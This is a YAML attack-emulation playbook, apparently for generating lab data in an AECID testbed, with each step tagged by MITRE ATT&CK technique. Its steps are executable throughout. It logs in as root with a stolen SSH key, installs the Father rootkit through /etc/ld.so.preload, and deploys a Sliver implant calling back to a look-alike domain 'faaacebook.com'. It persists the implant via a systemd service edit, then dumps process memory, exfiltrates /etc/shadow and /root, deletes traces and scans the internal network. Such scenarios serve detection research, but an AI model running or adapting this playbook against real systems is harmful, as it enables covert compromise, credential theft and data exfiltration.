####################
#
# Scenario 2 a c
#
####################

vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $DOMAIN: aecid-testbed.com
  $USER: aecid
  $SSH_KEY: "{{user_home.stdout}}/.ssh/privesc_key_videoserver"
  $IMPLANTPATH: /tmp/superimplant
  NETWORK: "172.17.100.0/24"
  FATHER_INSTALLPATH: "/usr/lib/selinux.so.3"
  FATHER_CHROOTFILE: "/home/aecid/glibc_rootjail.tar.xz"

commands:
  - type: ssh
    cmd: id
    hostname: $SERVER_ADDRESS
    port: 2222
    username: root
    key_filename: $SSH_KEY
    creates_session: "root"
    metadata:
      techniques: "T1021"
      tactics: "Lateral Movement"

  - type: mktemp
    cmd: dir
    variable: FATHERCHROOT

  - type: shell
    cmd: sudo tar -C $FATHERCHROOT -xvJf $FATHER_CHROOTFILE

  - type: father
    cmd: generate
    env_var: "AECID"
    file_prefix: "hiyw"
    # group: fax
    gid: "21"
    shell_pass: "haveityourway"
    install_path: $FATHER_INSTALLPATH
    local_path: $FATHERCHROOT/rootjail/tmp
    build_command: sudo chroot $FATHERCHROOT/rootjail /bin/bash -c "cd /tmp/Father && make"

  - type: sftp
    cmd: put
    local_path: $LAST_FATHER_PATH
    remote_path: $FATHER_INSTALLPATH
    mode: "0644"
    session: root
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"
      technique_name: "Ingress Tool Transfer"

  - type: shell
    cmd: sudo rm -rf $FATHERCHROOT/rootjail

  - type: sliver
    cmd: "generate_implant"
    c2url: "https://faaacebook.com"
    name: "superimplant"
    filepath: $IMPLANTPATH

  - type: sliver
    cmd: start_https_listener
    host: "0.0.0.0"
    port: "443"
    metadata:
      techniques: "T1071.001,T1573"
      tactics: "Command and Control"
      technique_name: "Application Layer Protocol: Web Protocols,Encrypted Channel"

  - type: shell
    cmd: ls $IMPLANTPATH

  - type: sftp
    cmd: put
    local_path: $LAST_SLIVER_IMPLANT
    remote_path: /usr/bin/zmcontroller
    mode: "755"
    session: "root"
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"
      technique_name: "Ingress Tool Transfer"
   
  - type: ssh
    cmd: "vim /etc/systemd/system/multi-user.target.wants/zoneminder.service\n"
    interactive: True
    session: "root"
    metadata:
      techniques: "T1543.002,T1569,T1037"    
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service,System Services,Boot or Logon Initialization Scripts"

  - type: ssh
    cmd: ":inoremap jj <ESC>\n"
    interactive: True
    session: "root"
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    interactive: True
    cmd: "/[Service\n"
    session: "root"
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    cmd: "o"
    interactive: True
    session: "root"
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    cmd: ExecStartPre=sudo -g fax bash -c "/usr/bin/zmcontroller &"
    interactive: True
    session: "root"
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    cmd: "jj"
    interactive: True
    session: "root"
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    cmd: ":wq!\n"
    interactive: True
    session: "root"
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    cmd: "echo /usr/lib/selinux.so.3 >> /etc/ld.so.preload"
    session: root
    metadata:
      techniques: "T1014,T1564,T1574"  
      tactics: "Persistence"
      technique_name: "Rootkit,Hide Artifacts,Hijack Execution Flow"

  - type: ssh
    cmd: systemctl daemon-reload
    session: root
    metadata:
      techniques: "T1543.002" 
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: ssh
    cmd: systemctl restart zoneminder.service
    session: root
    metadata:
      techniques: "T1543.002"  
      tactics: "Persistence"
      technique_name: "Create or Modify System Process: Systemd Service"

  - type: sliver-session
    cmd: ls
    remote_path: "."
    session: superimplant
    metadata:
      techniques: "T1083"  
      tactics: "Discovery"
      technique_name: "File and Directory Discovery"

  - type: sliver-session
    cmd: ps
    session: superimplant
    metadata:
      techniques: "T1057" 
      tactics: "Discovery"
      technique_name: "Process Discovery"

  - type: regex
    cmd: (\d+) .*mariadb
    output:
      PROCESS: "$MATCH_0"
    metadata:
     techniques: "T1007"  
     tactics: "Discovery" 
     technique_name: "System Service Discovery"

  - type: debug
    cmd: "$PROCESS"

  - type: mktemp
    variable: TEMPPROCDUMP

  - type: sliver-session
    cmd: process_dump
    pid: "1"
    session: superimplant
    local_path: $TEMPPROCDUMP
    metadata:
      techniques: "T1003"  
      tactics: "Credential Access"
      technique_name: "OS Credential Dumping"

  - type: sliver-session
    cmd: netstat
    session: superimplant
    metadata:
      techniques: "T1049"
      tactics: "Discovery"
      technique_name: "System Network Connections Discovery"

  - type: sliver-session
    cmd: ifconfig
    session: superimplant
    metadata:
      techniques: "T1016" 
      tactics: "Discovery"
      technique_name: "System Network Configuration Discovery"

  - type: mktemp
    variable: SHADOW

  - type: sliver-session
    cmd: download
    remote_path: /etc/shadow
    local_path: $SHADOW
    session: superimplant
    metadata:
      techniques: "T1003.008,T1041"
      tactics: "Credential Access,Collection,Exfiltration"
      technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow,Exfiltration Over C2 Channel"

  - type: sliver-session
    cmd: execute
    exe: /usr/bin/tar
    args:
      - cvzf
      - /tmp/r.tar.gz
      - /root
    session: superimplant
    metadata:
      techniques: "T1560.001,T1074.001"
      tactics: "Collection,Exfiltration"
      technique_name: "Archive Collected Data: Archive via Utility,Data Staged: Local Data Staging"

  - type: mktemp
    variable: ROOTTAR

  - type: mktemp
    variable: ROOTTAR2

  - type: sliver-session
    cmd: download
    remote_path: /tmp/r.tar.gz
    local_path: $ROOTTAR
    session: superimplant
    metadata:
      techniques: "T1041"
      tactics: "Exfiltration"
      technique_name: "Exfiltration Over C2 Channel"

  - type: sliver-session
    cmd: rm
    remote_path: /tmp/r.tar.gz
    session: superimplant
    metadata:
      techniques: "T1070.004"
      tactics: "Defense Evasion"
      technique_name: "Indicator Removal: File Deletion"

  - type: sliver-session
    cmd: download
    remote_path: /root
    local_path: $ROOTTAR2
    recurse: True
    session: superimplant
    metadata:
      techniques: "T1005"
      tactics: "Collection"
      technique_name: "Data from Local System"

  - type: sliver-session
    cmd: execute
    exe: cat
    args:
      - /etc/pam.d/common-password
    session: superimplant
    metadata:
      techniques: "T1201"
      tactics: "Discovery"
      technique_name: "Password Policy Discovery"

  - type: sliver-session
    cmd: execute
    exe: cat
    args:
      - /etc/passwd
    session: superimplant
    metadata:
      techniques: "T1003.008"
      tactics: "Discovery"
      technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow"

  - type: sliver-session
    cmd: execute
    exe: chage
    args:
      - -l
      - $USER
    session: superimplant
    metadata:
      techniques: "T1201"
      tactics: "Discovery"
      technique_name: "Password Policy Discovery"

  - type: sliver-session
    cmd: upload
    local_path: /var/www/html/nmap
    remote_path: /tmp/nmap
    session: superimplant
    metadata:
      techniques: "T1105,T1046,T1018"
      tactics: "Command and Control"
      technique_name: "Ingress Tool Transfer,Network Service Discovery,Remote System Discovery"


  - type: sliver-session
    cmd: execute
    exe: chmod
    args:
      - "755"
      - /tmp/nmap
    session: superimplant
    metadata:
      techniques: "T1046,T1018"
      tactics: "Discovery"
      technique_name: "Network Service Discovery,Remote System Discovery"

  - type: sliver-session
    cmd: execute
    exe: /tmp/nmap
    args:
      - "172.17.100.0/24"
    session: superimplant
    metadata:
      techniques: "T1046,T1018"
      tactics: "Discovery"
      technique_name: "Network Service Discovery,Remote System Discovery"
